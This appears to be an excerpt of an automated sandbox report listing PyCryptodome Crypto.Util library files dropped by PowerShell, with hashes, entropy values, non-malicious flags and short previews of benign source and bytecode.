                                                                                                                                                                                                                      SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                                                      MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                                                      SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                                                      SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                                                      SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):166
                                                                                                                                                                                                                      Entropy (8bit):4.7074966574817525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                                                      MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                                                      SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                                                      SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                                                      SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1968
                                                                                                                                                                                                                      Entropy (8bit):4.96168817055765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
                                                                                                                                                                                                                      MD5:CCD084ED08A6E3D89DC9B9ECD62D524D
                                                                                                                                                                                                                      SHA1:439DDFB5344BA4510F46A29913E7764824094696
                                                                                                                                                                                                                      SHA-256:98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
                                                                                                                                                                                                                      SHA-512:354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2257
                                                                                                                                                                                                                      Entropy (8bit):5.237546031397441
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:iIjDsj8MtyHquSS9zvu8DjtRfanT2xuDDit:PsYMQ1SsDxxRfayZt
                                                                                                                                                                                                                      MD5:893D357F2CBC05E2D4D42389B8B8DB36
                                                                                                                                                                                                                      SHA1:0006A33B4B0F045E60271055D30104437FFAA6E0
                                                                                                                                                                                                                      SHA-256:A8B44F41875F849257BB79C942B8D26F07BFB97994A50D455A2B14649A447EB2
                                                                                                                                                                                                                      SHA-512:64F68E775B0A89E2AA843CC4C72FB08D518CF8D57B2B29108A14E44F7F6F0EA8F1B8782858111CDBBF521CD35C37BC6927924AC9A2D67802D2FC226CC29048FA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.d...Z.y.)......c..........................|.d.z...d.k7..r.t.........d...........|.j...........................}.|.|.kD..r.t.........d.|.|.f.z.............|.d.z...|.|.|.|.d...S.).a....Create a stateful counter block function suitable for CTR encryption modes... Each call to the function returns the next counter block.. Each counter block is made up by three parts:.. +------+--------------+-------+. |prefix| counter value|postfix|. +------+--------------+-------+.. The counter value is incremented by 1 at each call... Args:. nbits (integer):. Length of the desired counter value, in bits. It must be a multiple of 8.. prefix (byte string):. The constant prefix of the counter block. By default, no prefix is. used.. suffix (byte string):. The constant postfix of the counter block. By default, no suffix is. used.. initial_value (integer):. The initial value of the
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3248
                                                                                                                                                                                                                      Entropy (8bit):5.650288368009269
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:1lm7nAeKJdRXl9OT2xRO7LumeTxes2UkxDWlxeKbNRTAyKqnQfCgQJk6N:1lmzAeqzFISVt2UkAre63AnqnQfIJzN
                                                                                                                                                                                                                      MD5:BFFF8EAD34CC80BF4ABE2AF1A7DDF109
                                                                                                                                                                                                                      SHA1:5E353DB6C48CB49A988C913A4C6797C646D47D69
                                                                                                                                                                                                                      SHA-256:983E4CB8A13A36D4C9AA0F51C018EC7B068CDE53485B681D0D2ABCF05100044C
                                                                                                                                                                                                                      SHA-512:B519C34E53EC01F635F6D376E8A9D1D95BF317E7E25AFDFA92105203968FD084AC7B6B86C69F1341801816C735D9E13CB03895BB1186B126BF8FED8D89F59AAA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.eE.........................&.....d.d.g.Z.d.d.l.....d.d...Z.d.d...Z.y.)...pad..unpad.....)...*c...........................|.t.........|.........|.z...z...}.|.d.k(..r.t.........|.........|.z...}.|.|.z...S.|.d.k(..r"t.........d.........|.d.z...z...t.........|.........z...}.|.|.z...S.|.d.k(..r"t.........d.........t.........d.........|.d.z...z...z...}.|.|.z...S.t.........d...........).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. ..pkcs7..x923r...........iso7816......Unknown padding style)...len..bchr..ValueError)...data_to_pad..block_size..style..padding_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16826
                                                                                                                                                                                                                      Entropy (8bit):5.45076287707543
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:0uWaBMeMGIt5d+uGQgXmKLHift1IxnJNBajiF0TF2:0uWoMpGItfgPCfbIxJr7FcF2
                                                                                                                                                                                                                      MD5:5113E5D36CF0FBC2FFFE16773C2BFE05
                                                                                                                                                                                                                      SHA1:5A0282078AE94D37A9C13AC3F619560FEC6233C7
                                                                                                                                                                                                                      SHA-256:DCE29CA6BD30DFEB4C762FD3DAB4ADE2AE6504FCF2C95BA746493945247F19D3
                                                                                                                                                                                                                      SHA-512:7C83AB7E3D1C93D1700F969C5A08ED035C215941AF5A40BED64213879E9009A581347C7763BD79474D034400A70BDEE6BEC2461FEAD329790246B42F2027C8DA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.eJT.............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..Z.d#..Z.d$..Z.d%..Z.d&..Z.g.d'..Z.y.)(.....)...print_functionN)...bord..bchr..0000.......0001.......0010.......0011.......0100.......0101.......0110.......0111.......1000.......1001.......1010.......1011.......1100.......1101.......1110.......1111c.....................X.....t.........d...|.........}.t.........d...|.........}.d.j...................|.........S.).z,Convert a key into a string of binary digitsc...........................t.........|.........S.).N).r........xs.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/RFC1751.py..<lambda>z._key2bin.<locals>.<lambda>(...s.......t.A.w.......c.....................4.....t.........|.d.z.......t.........|.d.z.......z...S.).Nr....r#...)...binaryr'...s.... r)...r*...z._key2bin.<locals>.<lambda>)...s.......v.a.1.f.~...q
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1156
                                                                                                                                                                                                                      Entropy (8bit):4.944869463452275
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:opJmI4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBlg2x4g2I:GmnASgf++BcD4YaQVprGGBS2xTX
                                                                                                                                                                                                                      MD5:B101A0135BB256FEA1257DAADDBA7011
                                                                                                                                                                                                                      SHA1:BA613F9CE97F545D2BCD8B38E2588BC6A86D5793
                                                                                                                                                                                                                      SHA-256:5431B76F0B2F65175CE4B8B70949B832AEE5765084F3619422D6D54952813831
                                                                                                                                                                                                                      SHA-512:55674256C1BD63595D19D0750F9AE50D3C1DC0FDA6204C1BE0A9F4DA6786DBDB4C4D748B6CEE06DAE63940BC2F05961BCC9F6EBDD7699D1E04449AA4AB1485F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.Z.g.d...Z.y.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..PaddingN)...__doc__..__all__....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):861
                                                                                                                                                                                                                      Entropy (8bit):4.743941844557793
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:wpnbnTXgAiXrekrOS07Z7Z//2IkbREg8rUSlOWxAAdaPboXk:mTQAib7rOSkpZX2xl0U/hAcPboXk
                                                                                                                                                                                                                      MD5:C377B0D0A2F550880994E74CF20102AC
                                                                                                                                                                                                                      SHA1:E42446FFE32ACF82B02D12B0026A2C70D536C7A6
                                                                                                                                                                                                                      SHA-256:74A56DCAFDBC7EB45964F971D520BCD7BDB9990BEB463B83C5C7650E18788E1E
                                                                                                                                                                                                                      SHA-512:E27E6043A1367B1A7FC387B5A323CBA44448F0A2560D6557DCADED5DEBDC9DF3B01B7021B683743924C65789FD9BFDEF94C54A254160F621102B17B5F70C8B19
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.d.l.m.Z.....e.d.d.........Z.d...Z.d...Z.y.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................*.....t.........j...........................S...N)..._raw_cpuid_lib..have_aes_ni........mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/_cpu_features.pyr....r....)...s...........%..%..'..'r....c.....................*.....t.........j...........................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r......<module>r........s(.........>..;....+.+A...,/....0......(....'r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                      Entropy (8bit):5.155738794548557
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:lcv+6HTZ2HBZ8SlwC8El3OyrPE2x5lNSIxnn0Yzqtp:lcm6SZkCreyTE2x5l7xnfqD
                                                                                                                                                                                                                      MD5:F55F01AC5C1DDBA7EF04F0C2996AB605
                                                                                                                                                                                                                      SHA1:25392803B553286AFDD1E44F38CCCE2FA8EA6EB3
                                                                                                                                                                                                                      SHA-256:269554CB6903904C50E403F934DAF27D0D7D10A5AEACC27EB032EE327B879277
                                                                                                                                                                                                                      SHA-512:1F526E56D050B6DB5168863365822A07CFB6616620DC9F62F8B288077624B16B303FC12F58199A55E77358E34C5FA801E6A735D1EABB9C564016B8EBAFDA9F1B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.d.l.Z.d...Z.y.)......Nc.....................R.....|.d.....d.k7..r.t.........d...........t.........|.d.d...........|.g.z...}.t.........j...................j...................t.........j...................j...................t.........................\...}.}.t.........j...................j...................|.d.........}.t.........j...................j...................|.g.|.......S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12949
                                                                                                                                                                                                                      Entropy (8bit):5.153107212502531
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:WXZddaN1GLnVAOI+/ylEr4GKlAoBQKlUx8mTwrjYCMGQpPCSS9O62ipuowY:GZd4N14nmlg8dGKl9pavujYLGQlGH
                                                                                                                                                                                                                      MD5:99791F8E012D03AFF225031A0D3C7834
                                                                                                                                                                                                                      SHA1:83337F2D97C51690C29F0E6301AADF690E26E03B
                                                                                                                                                                                                                      SHA-256:77179C4FE925BBBF71C866DA6B850369B7DD2EDCBEA1D85419682B74CA7196D6
                                                                                                                                                                                                                      SHA-512:1BA9681F5708EA173D2AA2BD5536B7D59CEF910FEE3E8C502FA3A9D81FF5FE953D4B2421EBCA42771AD9A1BDB21A0EEF6E95A135DA700BF51E9CF3DA82902608
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e}*.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................d.....d.k...rBd.d.l.Z.g.Z...e.j...........................D.]'..\...Z.Z.Z.e.e.j...................k(..s...e.j...................e............)..n.d.d.l.m.Z...e.j$..................Z.e.e.f.Z...G.d...d.e.........Z...d.e.j0..................v.r!e.j2..................j4..................d.k(..r...e.d...........e.j...................d.k\..r.e.j8..................d.k(..r...e.d...........d.d.l.m.Z.....e.........Z.e.j@..................Z!e.jE..................e.jG..................d.................Z$e.jG..................d.........jJ..................jL..................Z'd...Z(d...Z)e)Z*e)Z+e)Z,d...Z-d/d...Z.d...Z/d...Z0d...Z1..G.d...d.e.........Z2d...Z3d.Z4..G.d*..d+e.........ZLd,..ZMd-..ZNd...ZOy.#.e.$.r...d.d.l5Z5d.d.l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d.l9m:Z:..d.d.l5m;Z'..d.Z!g.Z<d...Z,d ..Z(d!..Z/d"..Z0e5jz..................Z>d.Z?e5j...................j...............
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):40615
                                                                                                                                                                                                                      Entropy (8bit):5.26162195253553
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:eXqPoFGtp4WG1rfltw3nD+/t3YW55q2gVKvfZSBOy3:e+jLqxtwXDGt3YWDq2gcfQBh3
                                                                                                                                                                                                                      MD5:78A7074BE84E9FBF868C713ED4A9EB7D
                                                                                                                                                                                                                      SHA1:D815AC39AF73063624D3D06940023C29C4DF8972
                                                                                                                                                                                                                      SHA-256:81C66EC093BF186F80DD9F525C44C9E2768EB8F1168DA640FD5C95E78E84389F
                                                                                                                                                                                                                      SHA-512:0737A4F527B85DA7B047FCB7081F25428D26F699E7D2F500B6782B9E64BA4982F8947877D60B6D869D055D06F0EFAFF29C0E77A8F229BF04A0C1567B29274AF0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.eq...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfc.....................D.....d.}...|.|.z...}.|...x.s...|.d.k\..S.#.t.........$.r...Y.y.w.x.Y.w.).Nr....F)...TypeError)...x..only_non_negative..tests.... .dC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/asn1.py.._is_numberr....(...s=.........D.........4.x......!.. ..*.A...F..*....................s................c.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...BytesIO_EOFzeThis class differs from BytesIO in that
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65681
                                                                                                                                                                                                                      Entropy (8bit):5.282887609749514
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:u9eNq1WKLhZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXl:WcKlpyUy0lsEgZOtg78sI6VTLQ5DRvvI
                                                                                                                                                                                                                      MD5:FE38EFEDEAC7EDB8DBAA44168F359F1D
                                                                                                                                                                                                                      SHA1:C5671E13DFC250BD970883B90834EF5D95488D8C
                                                                                                                                                                                                                      SHA-256:5AF417D449A36243814A6D77179FC3A5D17661FF032867256C321B73567EEA2A
                                                                                                                                                                                                                      SHA-512:B24601CB14886BF26409B88D8F8D39E08953F2C16E2158DF522BB394A3E201BA481C737C0A45D7613EB9D6BA20FEC6D96045D2E95172ECAA435C01E9255ECC8B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.eh~........................".....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j...................d.d...d.k\..r.e.j...................Z.n.d...Z.e.j...................d.d...d.k\..r.d...Z.n.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.Z.d.d...Z.d...Z.d.d.l.Z.d.d...Z.d...Z.d.Z.y.)......N)...Random)...iter_rangec..........................|.d.k(..r.t...................|.d.k...s.|.d.k...r.t.........d...........t.........|.|.........\...}.}.|.d.k7..r.|.d.k7..r.|.d.z...}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..qs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Util/number.py..ceil_divr....%...sW...........A.v.....!..!....A...1.q.5......../../....!.Q.<.D.A.q....Q...Q.!.V....Q........H.....c.....................B.....|.d.k...r.t.........d...........|.j......................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7049
                                                                                                                                                                                                                      Entropy (8bit):4.928475235919222
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Yppa1YDLOjIWTmpSaRBF7mxzw3VYzO6BJcerI2mYVe07P31PVFU:YfaeUIW82uirckyynP3vFU
                                                                                                                                                                                                                      MD5:103C85B15FC29D2C0237D3775DD1991A
                                                                                                                                                                                                                      SHA1:3C7A95FEB43AE3DD588661B93ED3A0D7AA0A0801
                                                                                                                                                                                                                      SHA-256:501B9410AF93989544604F51717DF1F88A6EDFEB21AB7CB1EA0B411490AC5BC6
                                                                                                                                                                                                                      SHA-512:AE122401B551BB8E6F9C8B807521239977B381BFD16997C5C00C5F1DC9DBFBE309249F84E0B3D1DA76269441084CBA96A319C320EB9CEF6956DB9AF92C2130D1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.ez.........................Z.....d.Z.d.d.l.Z.d.d.l.Z.e.j...................d.....d.k(..rLd...Z.d...Z.d...Z.d...Z.d#d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d...Z.d...Z.d...Z...e.j(..................d.e.f.d.d.i.........Z.e.Z.n>d...Z.d...Z.d...Z.d...Z.d#d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d...Z.d...Z.d ..Z.d.d!l.m.Z...e.Z.d"..Z.[.[.y.)$a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to be
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4251
                                                                                                                                                                                                                      Entropy (8bit):5.1859041653380675
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Sffkv/3lfZ9TNJwyJfT/8i8uz/Z6L0x422q54x:Sk3FP7h8Uu0VOx
                                                                                                                                                                                                                      MD5:0DE7404EBD72B0FC12CB57CEE3030993
                                                                                                                                                                                                                      SHA1:DDDF5659CD09AC956F41AC91698CA5D2C63BCD5D
                                                                                                                                                                                                                      SHA-256:75F2BCE0E883364683E154EC187E3B631DB7225C26540417909962B249EC113D
                                                                                                                                                                                                                      SHA-512:0A7256F717F458F20ED4264BE939E67DCD72789844E2E080F67D2C896908CDFE826DB213ED779253EABD93709974D75B8D7B43FD6E9BD7AC769D845260EAFF0A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e..........................L.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d.d...Z.d.d...Z.d...Z.y.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc..........................t.........|.........t.........|.........k7..r.t.........d...........|...t.........t.........|.................}.nF|.}.t.........|.........s.t.........d...........t.........|.........t.........|.........k7..r.t.........d.t.........|.........z.............t.........j...................t.........|.........t.........|.........t.......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2035
                                                                                                                                                                                                                      Entropy (8bit):5.0956096784751965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
                                                                                                                                                                                                                      MD5:D4DD7789231F56101EAA341F5FD21A95
                                                                                                                                                                                                                      SHA1:81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
                                                                                                                                                                                                                      SHA-256:38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
                                                                                                                                                                                                                      SHA-512:268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                      Entropy (8bit):4.354688723015057
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                                                                                                      MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                                                                                                      SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                                                                                                      SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                                                                                                      SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
